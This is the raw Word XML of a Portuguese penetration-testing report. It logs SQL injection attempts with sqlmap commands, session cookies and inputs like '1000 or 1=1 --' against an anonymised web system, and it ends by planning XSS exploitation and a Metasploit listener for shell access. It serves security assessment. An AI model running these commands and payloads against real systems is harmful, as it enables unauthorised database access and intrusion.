    <w:p w:rsidR="00510DD2" w:rsidRDefault="005967D5" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415"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Default="00D76012" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00190AAD" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“validade” escolhido </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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17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510DD2" w:rsidRPr="00F15F82" w:rsidRDefault="00510DD2" w:rsidP="00510DD2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1415" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008D0530" w:rsidRPr="00F15F82" w:rsidRDefault="001F4C0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E7DACC" wp14:editId="57C19029">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>529590</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2868295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3905250" cy="1238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16B8D" id="Rectangle 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:41.7pt;margin-top:225.85pt;width:307.5pt;height:9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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008D0530"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601ABC7" wp14:editId="3927EB21">
            <wp:extent cx="5400040" cy="41719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1F4C0E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17</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- Resultado exploração Sql Inj</w:t>
      </w:r>
      <w:r w:rsidR="001F4C0E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ction via Sqlmap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36432A" w:rsidRDefault="0036432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36432A" w:rsidRPr="00F15F82" w:rsidRDefault="0036432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5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007804EC" w:rsidRDefault="007804EC" w:rsidP="007804EC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7804EC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Alterar o comando utilizado nas </w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sessões</w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s anteriores para incluir o parâmetro </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594AD8"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7804E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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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7804EC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>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: sqlmap –r params –p </w:t>
      </w:r>
      <w:r w:rsidR="00790EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina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36432A" w:rsidRDefault="0036432A" w:rsidP="00630433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“sqlmap” executa a ferramenta Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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O comando “–r“ indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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“-p” indica o parâmetro que deve ser injetado</w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pelo Sqlmap, que nesse caso corresponde a um parâmetro de entrada de dados utilizado pela tela </w:t>
      </w:r>
      <w:r w:rsidR="0036432A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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</w:t>
      </w:r>
      <w:r w:rsidR="00790EC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” é o atributo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71A0F" w:rsidRPr="00F15F82" w:rsidRDefault="00B71A0F" w:rsidP="00CE5109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B71A0F" w:rsidRPr="00F15F82" w:rsidRDefault="00B71A0F" w:rsidP="00CE5109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 parâmetro “</w:t>
      </w:r>
      <w:r w:rsidR="00CE5109">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r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CE5109" w:rsidRDefault="005967D5" w:rsidP="00CE5109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F15F82" w:rsidRDefault="00D76012" w:rsidP="00CE5109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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00CE5109">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vacina</w:t>
      </w:r>
      <w:r w:rsidR="00B71A0F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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18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D0530" w:rsidRPr="00F15F82" w:rsidRDefault="00BD295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2776855</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3914775" cy="142240"/>
                <wp:effectExtent l="0" t="0" r="28575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DEC5B" id="Rectangle 11" o:spid="_x0000_s1026" style="position:absolute;margin-left:38.7pt;margin-top:218.65pt;width:308.25pt;height:1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" filled="f" strokecolor="#f79646 [3209]" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="008D0530"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B7411F3" wp14:editId="3EE183A0">
            <wp:extent cx="5400040" cy="411226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D45386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18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Sql Injection via Sqlmap.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D45386" w:rsidRDefault="00D4538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6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00D45386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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Alterar o comando utilizado nas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>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro”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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p cadastro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O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo params.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“cadastro” é o atributo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D975CE" w:rsidRPr="00F15F82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975CE" w:rsidRPr="00F15F82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 parâmetro “cadastro”.</w:t>
      </w:r>
      <w:r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lastRenderedPageBreak/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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00D975CE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cadastro” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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19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5A529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C835DA0" wp14:editId="06ABAE6D">
            <wp:extent cx="5400040" cy="412686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19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Sql Injection via Sqlmap.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7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Alterar o comando utilizado nas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>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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Tentar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando: sqlmap -r params -p ok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r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params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“ok” é o atributo que sofrerá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injeção.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 xml:space="preserve"> “ok”.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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“ok” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 20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236F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4F4346" wp14:editId="12D48656">
            <wp:extent cx="5400040" cy="405828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20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Sql Injection via Sqlmap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3.5 Tela Consulta Servidor - SQL Injection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Tarefa realizada dia 18/04/16.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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 1 hora e 40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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página de Consulta Servidor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na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 forçar ações não autorizadas no sistema.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Resultados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1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Verificar se o campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é vulnerável à injeção de código SQL fazendo uso da técnica de concatenação de aspas simples.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Pr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema realize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Entrada: 1000’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Siape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2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Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Siape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”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao siape de usuários cadastrados. Comentários inline foram utilizados na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 forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.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F15F82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Esper-se que o sistema realize o tratamento para impedir que os comentários sejam interpretados como parte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Entradas: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1000 or 1=1 # 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1000 or 1=1  --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8C6DC7" w:rsidP="00630433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Tela Consulta Servidor – Exploração via Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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Tarefa realizada nos dias 19, 20 e 22/04/16.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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 3 horas e 30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Utilizar a ferramenta Sqlmap para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a partir de injeção de códigos SQL.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Resultados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1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Verificar se a tela Consulta Servidor é vulnerável a injeção de código SQL e caso haja vulnerabilidade conseguir obter o nome do banco de dados utilizado pelo sistema.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Para realizar essa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foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP de uma requisição no momento em que a página de Consulta Servidor é acessada.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F15F82" w:rsidRDefault="000D038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E3243AB" wp14:editId="695AF154">
            <wp:extent cx="4486275" cy="12382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23(Editada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21</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Parâmetros obtidos através do Burp Suite.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Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B01036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B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py -u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores"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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db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63043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“./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“--cookie” especifica um cookie de sessão válido a ser passado para o Sqlmap durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“--current -db” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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65D65" w:rsidRPr="00F15F82" w:rsidRDefault="00D65D6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D65D6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-se que a tela de Consulta servidor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 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seja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possível descobrir o nome do banco de dados utilizado pela aplicação.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>. Não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.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As figuras 2</w:t>
      </w:r>
      <w:r w:rsidR="00605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e 23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mostram os resultados do Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="00022ED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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="001C4F4D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w: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0E9073E" wp14:editId="66C7CCA8">
            <wp:extent cx="5400040" cy="40544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22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SQL Injection via Sqlmap – Parte 1.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04EFF" w:rsidRPr="00F15F82" w:rsidRDefault="00F04EF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A0341E5" wp14:editId="0A03A125">
            <wp:extent cx="5428615" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="63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5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lastRenderedPageBreak/>
        <w:t>Figura 23</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração SQL Injection via Sqlmap – Parte 2.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2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Repetir a ação da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2 e aumentar o nível de heurística </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5.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Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00B01036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B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py -u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365" w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01036">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores"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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“--cookie” especifica um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“--current -db” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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2552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 “--level 5” comando utilizado para aumentar o nível da heurística utilizada no escaneamento.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6473CA" w:rsidRPr="00F15F82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473CA" w:rsidRPr="00F15F82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473CA" w:rsidRPr="00F15F82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-se que a tela Consulta Servidor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utilizado pela aplicação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>. Mesmo aumentando o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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>Iteração 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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8C6DC7" w:rsidP="00630433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Explorar XSS – Tela Cadastro Lotes de </w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs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27/04/16.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2 horas.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Explorar vulnerabilidade de XSS encontrado na tela Cadastro Lotes de </w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s na Iteração 3.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br/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 partir da máquina virtual que usa o Kali Linux, abrir uma conexão do </w:t>
      </w:r>
      <w:r w:rsidR="007D3513" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema explorado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fazendo uso de um listener da ferramenta Metasploit para acessar o sistema operacional que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D602EF" w:rsidRPr="00F15F82" w:rsidRDefault="00D602EF" w:rsidP="00AC10DC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3315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Passos</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> executados</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
